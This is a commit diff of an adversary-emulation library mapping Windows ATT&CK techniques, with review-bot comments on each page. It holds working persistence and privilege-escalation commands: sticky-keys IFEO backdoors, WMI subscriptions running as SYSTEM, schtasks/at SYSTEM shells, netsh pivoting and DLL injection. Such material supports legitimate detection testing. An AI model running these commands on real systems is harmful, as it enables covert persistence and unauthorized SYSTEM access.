$mscfilePath = "HKCU:\Software\Classes\mscfile"
if (Test-Path $mscfilePath) {
#Remove the registry entry
Remove-Item $mscfilePath -Recurse -Force
Write-Verbose "Removed registry entries"
}
if(Get-Process -Id $Process.Id -ErrorAction SilentlyContinue){
Stop-Process -Id $Process.Id
Write-Verbose "Killed running eventvwr process"
}
}
}
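Review bot: `$Command = $pshome + '\' + $Command` prepends `$PSHOME` to whatever the caller passes, but the `.EXAMPLE` passes the full `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` path, which yields a doubled, invalid path; either the example should pass `powershell.exe -enc ...` as the `.PARAMETER` text says, or the prefix should be applied only when the command is not already a path. `exit` inside a function terminates the host session that dot-sourced the script; use `return`. With `-Force` the function overwrites and then `Remove-Item -Recurse`s `HKCU:\Software\Classes\mscfile`, destroying any pre-existing per-user association rather than restoring it; export the key before modifying it. Under `-WhatIf`, `$Process` is never assigned, so the final `Get-Process -Id $Process.Id` runs against `$null` and errors instead of being skipped.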

View File

@ -0,0 +1,31 @@
## Accessibility Features
MITRE ATT&CK Technique: [T1015](https://attack.mitre.org/wiki/Technique/T1015)
### osk.exe swap
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
### sethc.exe swap
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
### utilman.exe swap
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
### magnify.exe swap
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
### narrator.exe swap
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
### DisplaySwitch.exe swap
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
### AtBroker.exe swap
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AtBroker.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
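Review bot: the headings say "swap" but each command registers `cmd.exe` as an IFEO `Debugger` for the accessibility binary, not a file swap; naming them "IFEO Debugger" makes the detection target (a write to `...\Image File Execution Options\<binary>\Debugger`) obvious. The first command is `reg add` with `/v` before `/t`, the rest are `REG ADD` with `/t` first; pick one form. No cleanup is given; add `reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f` and the same for the other binaries, and put the commands in fenced code blocks as the WMI page in this commit does.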

View File

@ -0,0 +1,24 @@
## AppInit DLLs
MITRE ATT&CK Technique: [T1103](https://attack.mitre.org/wiki/Technique/T1103)
#### AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows
#### LoadAppInit_DLLs (REG_DWORD) Globally enables or disables AppInit_DLLs.
0x0 AppInit_DLLs are disabled.
0x1 AppInit_DLLs are enabled.
#### AppInit_DLLs (REG_SZ) Space or comma delimited list of DLLs to load. The complete path to the DLL should be specified using Short Names.
C:\ PROGRA~1\WID288~1\MICROS~1.DLL
##### RequireSignedAppInit_DLLs (REG_DWORD) Only load code-signed DLLs. 0x0 Load any DLLs.
0x1 Load only code-signed DLLs.
## Test Script
[AppInitInject.reg](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AppInitInject.reg)
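Review bot: the short-name example `C:\ PROGRA~1\WID288~1\MICROS~1.DLL` has a stray space after `C:\`, and the `RequireSignedAppInit_DLLs` entry runs the `0x0` meaning onto the heading line while `0x1` sits on its own line, unlike the `LoadAppInit_DLLs` entry above it. The key and value descriptions are written as `####`/`#####` headings, which no other page in this commit does; plain text plus a fenced block for the key path would match. A caveat is missing for anyone running the linked AppInitInject.reg: on Windows 8 and later with Secure Boot enabled, AppInit_DLLs are not loaded regardless of these values, so the test will not fire there.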

View File

@ -0,0 +1,17 @@
## Application Shimming
MITRE ATT&CK Technique: [T1138](https://attack.mitre.org/wiki/Technique/T1138)
#### Deploying a custom shim database to users requires the following actions:
##### 1.) Placing the custom shim database (*.sdb file) in a location to which the users computer has access (either locally or on the network)
##### 2.) Possibly calling the sdbinst.exe command-line utility to install the custom shim database locally.
##### 3.) Registry Modification - This is completed either manually or by an installation tool.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB
#### Detecting the shim execution is difficult. We suggest detection of Shim Installation.
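Review bot: "users computer" should be "user's computer", and the three numbered steps are written as `#####` headings rather than a list. Step 2 ("Possibly calling the sdbinst.exe command-line utility") is the concrete hook the closing line alludes to, so spell it out: an `sdbinst.exe` process launch plus writes to the `AppCompatFlags\Custom` and `AppCompatFlags\InstalledSDB` keys listed above are the installation events to detect. Unlike the other pages, no test script is linked.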

View File

@ -0,0 +1,5 @@
## Authentication Package
MITRE ATT&CK Technique: [T1131](https://attack.mitre.org/wiki/Technique/T1131)
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
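Review bot: the page gives only the `Lsa` key path, with no value name, description, test or detection guidance; the value that holds the package list is `Authentication Packages` (REG_MULTI_SZ) under that key, and a write to it is what a detection should watch. Either fill the page in or mark it as a stub so the matrix link does not suggest coverage that is not there.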

View File

@ -0,0 +1,13 @@
# Change Default File Association
MITRE ATT&CK Technique: [T1042](https://attack.mitre.org/wiki/Technique/T1042)
## User file association preferences are stored under
[HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
Changes to a user's preference will occur under this entry's subkeys.
## Change association with assoc.exe
cmd.exe assoc .wav="C:\Program Files\Windows Media Player\wmplayer.exe"
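Review bot: `cmd.exe assoc .wav="C:\Program Files\Windows Media Player\wmplayer.exe"` will not do what the heading says: `cmd.exe` needs `/c` to run a command given on its command line, and `assoc` maps an extension to a file type name (for example `.wav=WAVFile`), not to an executable; the executable for a file type is set with `ftype`. A working pair is `cmd.exe /c assoc .wav=WAVFile` followed by `cmd.exe /c ftype WAVFile="C:\Program Files\Windows Media Player\wmplayer.exe" "%1"`, and note that both write to HKEY_CLASSES_ROOT (the machine-wide `Software\Classes`), not to the per-user `FileExts` key the page describes, so the two are different detection locations. `[HKEY_CURRENT_USER]\Software\...` has stray brackets around the hive name.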

View File

@ -0,0 +1,17 @@
# Component Object Model Hijacking
MITRE ATT&CK Technique: [T1122](https://attack.mitre.org/wiki/Technique/T1122)
## The search order for locating COM Objects can be hijacked, causing unauthorized code to execute.
#### The presence of objects within
HKEY_CURRENT_USER\Software\Classes\CLSID\
#### May be anomalous and should be investigated since user objects will be loaded prior to machine objects in
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\
## Test Script
[COM Hijack Scripts](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/COMHijackScripts)
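Review bot: the two statements are written as `####` headings, and the second ("May be anomalous and should be investigated since ...") is a sentence fragment continuing the first; merge them into one paragraph: "Objects under HKEY_CURRENT_USER\Software\Classes\CLSID may be anomalous and should be investigated, since per-user objects are loaded before machine objects in HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID." One caveat worth adding for detection engineering: processes running elevated (high integrity) ignore per-user COM registrations, so an HKCU hijack only affects medium-integrity processes such as the `certutil` run in the linked test script, and a rule should not expect it to fire in elevated ones.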

View File

@ -0,0 +1,53 @@
# Netsh Helper DLL
MITRE ATT&CK Technique: [T1128](https://attack.mitre.org/wiki/Technique/T1128)
## A DLL can be registered to be loaded each time netsh.exe is executed, or for certain events.
Netsh interacts with other operating system components using dynamic-link library (DLL) files. Each Netsh helper DLL provides an extensive set of features called a context, which is a group of commands specific to a networking component. For example, Dhcpmon.dll provides netsh the context and set of commands necessary to configure and manage DHCP servers.
## Attackers can register a netsh helper with this command
netsh.exe add helper C:\Path\file.dll
## The following registry key stores the paths to the helpers
HKLM\SOFTWARE\Microsoft\Netsh
## Additional Netsh.exe testing we recommend
### Firewall Control
Input:
netsh firewall set opmode [disable|enable]
### Netsh.exe Pivoting
Input:
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
Can also support v4tov6, v6tov6, and v6tov4
### Netsh.exe Sniffing
Input:
netsh trace start capture=yes overwrite=no tracefile=<FilePath.etl>
to stop:
netsh trace stop
### Netsh.exe Wireless backdoor
Input:
netsh wlan set hostednetwork mode=[allow\|disallow]
netsh wlan set hostednetwork ssid=<ssid> key=<passphrase> keyUsage=persistent\|temporary
netsh wlan [start|stop] hostednetwork
Enables or disables hostednetwork service.
Complete hosted network setup for creating a wireless backdoor.
Starts or stops a wireless backdoor. See below to set it up.
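Review bot: the three description lines at the end of the "Wireless backdoor" section ("Enables or disables hostednetwork service.", "Complete hosted network setup ...", "Starts or stops a wireless backdoor. See below to set it up.") are detached from the commands they describe and "See below" points nowhere; place each next to its command. Pipe escaping is inconsistent (`[allow\|disallow]` and `persistent\|temporary` versus `[start|stop]`), which only matters inside a table. `netsh firewall` is the deprecated context (superseded by `netsh advfirewall`), so the Firewall Control example may not work on current systems. For the helper DLL itself the page could state the detection angle it already implies: a new value under `HKLM\SOFTWARE\Microsoft\Netsh` and a `netsh.exe add helper` command line.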

View File

@ -0,0 +1,9 @@
## Scheduled Task
MITRE ATT&CK Technique: [T1053](https://attack.mitre.org/wiki/Technique/T1053)
### Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time
[Examples Of Creating Tasks](https://technet.microsoft.com/en-us/library/cc725744(v=ws.11).aspx#BKMK_create)
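Review bot: this page repeats the heading and technique ID of the Scheduled Task page under Privilege Escalation in the same commit but carries only an external link; either merge it into that page and point the Persistence column of the matrix there, or state here which forms are the persistence case (for example the `/sc ONLOGON` task shown on the other page).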

View File

@ -0,0 +1,53 @@
## Windows Management Instrumentation Event Subscription
MITRE ATT&CK Technique: [T1084](https://attack.mitre.org/wiki/Technique/T1084)
### Persistence
Example:
```powershell
#Run from an administrator powershell window
#Code references
#https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
#https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
EventNameSpace='root\CimV2';
QueryLanguage="WQL";
Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs
$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";}
$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs
$FilterToConsumerArgs = @{
Filter = [Ref] $Filter
Consumer = [Ref] $Consumer
}
$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs
```
After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Cleanup:
```powershell
#Run from an administrator powershell window
#Code references
#https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
#https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
```
#### References
https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
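Review bot: the cleanup assumes the objects exist: if `$EventConsumerToCleanup` is `$null`, the query becomes `REFERENCES OF {} WHERE ...`, which throws, and the two trailing `Remove-WmiObject` lines then run against `$null`; guard the block with `if ($EventConsumerToCleanup) { ... }`. The persistence block calls `New-CimInstance` without checking for an existing filter or consumer of the same `Name`, so a second run fails on a duplicate key rather than reporting that the subscription is already present. Mixing `New-CimInstance` for creation with `Get-WmiObject` for cleanup is a style inconsistency; `Get-CimInstance`/`Remove-CimInstance` cover both. The "References" list duplicates the URLs already in the code comments.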

View File

@ -0,0 +1,10 @@
# Bypass User Account Control
MITRE ATT&CK Technique: [T1122](https://attack.mitre.org/wiki/Technique/T1122)
There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed.
## Test Script
[UACBypass](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/UACBypass)
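Review bot: the technique ID `T1122` is Component Object Model Hijacking (it is used for that page in this commit); Bypass User Account Control is `T1088` in ATT&CK, and the link should point there. The paragraph is sound; since it says effort belongs on process launches before and after a bypass, naming the concrete sequence the linked test produces (a write to `HKCU\Software\Classes\mscfile\shell\open\command` followed by `eventvwr.exe` launching the command stored there) would make it actionable.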

View File

@ -0,0 +1,17 @@
## DLL Injection
MITRE ATT&CK Technique: [T1055](https://attack.mitre.org/wiki/Technique/T1055)
Examples and code resource for [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/CodeExecution)
### PowerShell Invoke-ReflectivePEInjection
Input:
C:\Users\Public\PowerSploit-master\PowerSploit-master\CodeExecution\Invoke-ReflectivePEInjection.ps1
### Powershell Invoke-DllInjection
Input:
C:\Users\Public\PowerSploit-master\PowerSploit-master\CodeExecution\Invoke-DllInjection.ps1 -ProcessID 4274 -Dll evil.dll
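Review bot: the two "Input" lines are not runnable as written: both are paths to PowerSploit script files, and passing `-ProcessID 4274 -Dll evil.dll` to `Invoke-DllInjection.ps1` does nothing useful, since the script only defines the `Invoke-DllInjection` function; it has to be dot-sourced first (`. .\Invoke-DllInjection.ps1`) and the function then called. The `Invoke-ReflectivePEInjection` example has no parameters at all. "Powershell" should be "PowerShell" to match the heading above it, and `C:\Users\Public\PowerSploit-master\PowerSploit-master\...` is an unpacked-zip artifact path that should be generalised.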

View File

@ -0,0 +1,34 @@
## Scheduled Task
MITRE ATT&CK Technique: [T1053](https://attack.mitre.org/wiki/Technique/T1053)
## at.exe
Note: deprecated in Windows 8+
### Privileged Escalation
This command can be used locally to escalate privilege to SYSTEM or be used across a network to execute commands on another system.
Input:
at 13:20 /interactive cmd
Example:
net use \\[computername|IP] /user:DOMAIN\username password
net time \\[computername|IP]
at \\[computername|IP] 13:20 c:\temp\evil.bat
## schtask.exe
### Launch Interactive cmd.exe
Input:
SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
Input:
schtasks /create /tn "mysc" /tr C:\windows\system32\cmd.exe /sc ONLOGON /ru "System"
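Review bot: "## schtask.exe" should be `schtasks.exe` (the binary name used in the commands below it), and "Privileged Escalation" should be "Privilege Escalation". The `at ... /interactive` example runs only where `at.exe` is still supported, as the "deprecated in Windows 8+" note says, so the section should state that it targets Windows 7 / Server 2008 R2 and earlier. `c:\temp\evil.bat` has no counterpart in the commit and should be marked as a placeholder. Neither section gives cleanup (`schtasks /delete /tn spawn /f`, `schtasks /delete /tn mysc /f`) or the detection angle (a `schtasks.exe` command line with `/ru "System"`, or `at.exe` with `/interactive`).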

40
Windows/Windows.md Normal file
View File

@ -0,0 +1,40 @@
## MITRE ATT&CK Matrix - Windows
| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control |
|-------------------------------------------------------|---------------------------------------|-----------------------------------------|----------------------------------------|----------------------------------------|-------------------------------------|------------------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
| [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | Account Manipulation | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Application Shimming](Persistence/Application_Shimming.md) | Audio Capture | Automated Exfiltration | Commonly Used Port |
| [AppInit DLLs](Persistence/AppInit_DLLs.md) | [Accessibility Features](Persistence/Accessibility_Features.md) | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Exploitation of Vulnerability | Command-Line Interface | Automated Collection | Data Compressed | Communication Through Removable Media |
| [Application Shimming](Persistence/Application_Shimming.md) | [AppInit DLLs](Persistence/AppInit_DLLs.md) | Bypass User Account Control | [Create Account](Credential_Access/Create%20Account.md) | File and Directory Discovery | Logon Scripts | Execution through API | Clipboard Data | Data Encrypted | Connection Proxy |
| Authentication Package | [Application Shimming](Persistence/Application_Shimming.md) | Code Signing | [Credential Dumping](Credential_Access/Credential%20Dumping.md) | Network Service Scanning | Pass the Hash | Execution through Module Load | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol |
| Bootkit | Bypass User Account Control | Component Firmware | Credentials in Files | Network Share Discovery | Pass the Ticket | Graphical User Interface | Data from Local System | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol |
| [Change Default File Association](Persistence/Change_Default_file_association.md) | [DLL Injection](Privilege%20Escalation/DLL%20Injection.md) | Component Object Model Hijacking | Exploitation of Vulnerability | Peripheral Device Discovery | Remote Desktop Protocol | [InstallUtil](Execution/InstallUtil.md) | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding |
| Component Firmware | DLL Search Order Hijacking | [DLL Injection](Privilege%20Escalation/DLL%20Injection.md) | Input Capture | Permission Groups Discovery | Remote File Copy | [PowerShell](Execution/PowerShell.md) | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation |
| Component Object Model Hijacking | Exploitation of Vulnerability | DLL Search Order Hijacking | Network Sniffing | Process Discovery | Remote Services | Process Hollowing | Email Collection | Exfiltration Over Physical Medium | Fallback Channels |
| DLL Search Order Hijacking | File System Permissions Weakness | DLL Side-Loading | Private Keys | [Query Registry](Discovery/Query%20Registry.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | Scheduled Transfer | Multi-Stage Channels |
| External Remote Services | Local Port Monitor | Deobfuscate/Decode Files or Information | Two-Factor Authentication Interception | [Remote System Discovery](Discovery/Remote%20System%20Discovery.md) | Shared Webroot | [Regsvr32](Execution/Regsvr32.md) | Screen Capture | | Multiband Communication |
| File System Permissions Weakness | New Service | Disabling Security Tools | | Security Software Discovery | Taint Shared Content | Rundll32 | Video Capture | | Multilayer Encryption |
| Hidden Files and Directories | Path Interception | Exploitation of Vulnerability | | [System Information Discovery](Discovery/System%20Information%20Discovery.md) | Third-party Software | [Scheduled Task](Privilege%20Escalation/Scheduled%20Task.md) | | | Remote File Copy |
| Hypervisor | [Scheduled Task](Privilege%20Escalation/Scheduled%20Task.md) | [File Deletion](Defense%20Evasion/File_deletion.md) | | System Network Configuration Discovery | [Windows Admin Shares](Lateral%20Movement/Windows%20Admin%20Shares.md) | Scripting | | | Standard Application Layer Protocol |
| Local Port Monitor | Service Registry Permissions Weakness | File System Logical Offsets | | System Network Connections Discovery | Windows Remote Management | Service Execution | | | Standard Cryptographic Protocol |
| Logon Scripts | Valid Accounts | Hidden Files and Directories | | [System Owner/User Discovery](Discovery/System%20Owner-User%20Discovery.md) | | Third-party Software | | | Standard Non-Application Layer Protocol |
| Modify Existing Service | Web Shell | Indicator Blocking | | System Service Discovery | | Trusted Developer Utilities | | | Uncommonly Used Port |
| [Netsh Helper DLL](Persistence/Netsh_Helper_DLL.md) | | Indicator Removal from Tools | | System Time Discovery | | [Windows Management Instrumentation](Execution/Windows%20Management%20Instrumentation.md) | | | Web Service |
| New Service | | [Indicator Removal on Host](Defense%20Evasion/Indicator%20Removal%20on%20Host.md) | | | | [Windows Remote Management](Lateral%20Movement/Windows%20Remote%20Management.md) | | | |
| Office Application Startup | | Install Root Certificate | | | | [Bitsadmin](Execution/Bitsadmin.md) | | | |
| Path Interception | | [InstallUtil](Execution/RegsvcsRegasm.md) | | | | | | | |
| Redundant Access | | Masquerading | | | | | | | |
| Registry Run Keys / Start Folder | | Modify Registry | | | | | | | |
| Scheduled Task | | NTFS Extended Attributes | | | | | | | |
| Security Support Provider | | Network Share Connection Removal | | | | | | | |
| Service Registry Permissions Weakness | | Obfuscated Files or Information | | | | | | | |
| Shortcut Modification | | Process Hollowing | | | | | | | |
| System Firmware | | Redundant Access | | | | | | | |
| Valid Accounts | | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | | | | | | | |
| Web Shell | | [Regsvr32](Execution/Regsvr32.md) | | | | | | | |
| [Windows Management Instrumentation Event Subscription](Persistence/Windows_Management_Instrumentation_Event_Subscription.md) | | Rootkit | | | | | | | |
| Winlogon Helper DLL | | Rundll32 | | | | | | | |
| | | Scripting | | | | | | | |
| | | Software Packing | | | | | | | |
| | | Timestomp | | | | | | | |
| | | [Trusted Developer Utilities](Execution/Trusted_Developer_Utilities.md) | | | | | | | |
| | | Valid Accounts | | | | | | | |
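Review bot: the Defense Evasion cell `[InstallUtil](Execution/RegsvcsRegasm.md)` links to the Regsvcs/Regasm page; the Execution column links the same technique to `Execution/InstallUtil.md`, which is the right target. `Bypass User Account Control` is unlinked in the Privilege Escalation and Defense Evasion columns even though a Bypass User Account Control page is added in this commit, and the `Authentication Package` and `Component Object Model Hijacking` cells are likewise unlinked while their pages exist. The matrix mixes underscore file names (`Persistence/Change_Default_file_association.md`) with URL-encoded spaces (`Privilege%20Escalation/DLL%20Injection.md`); both work, but one naming scheme would make the links less brittle.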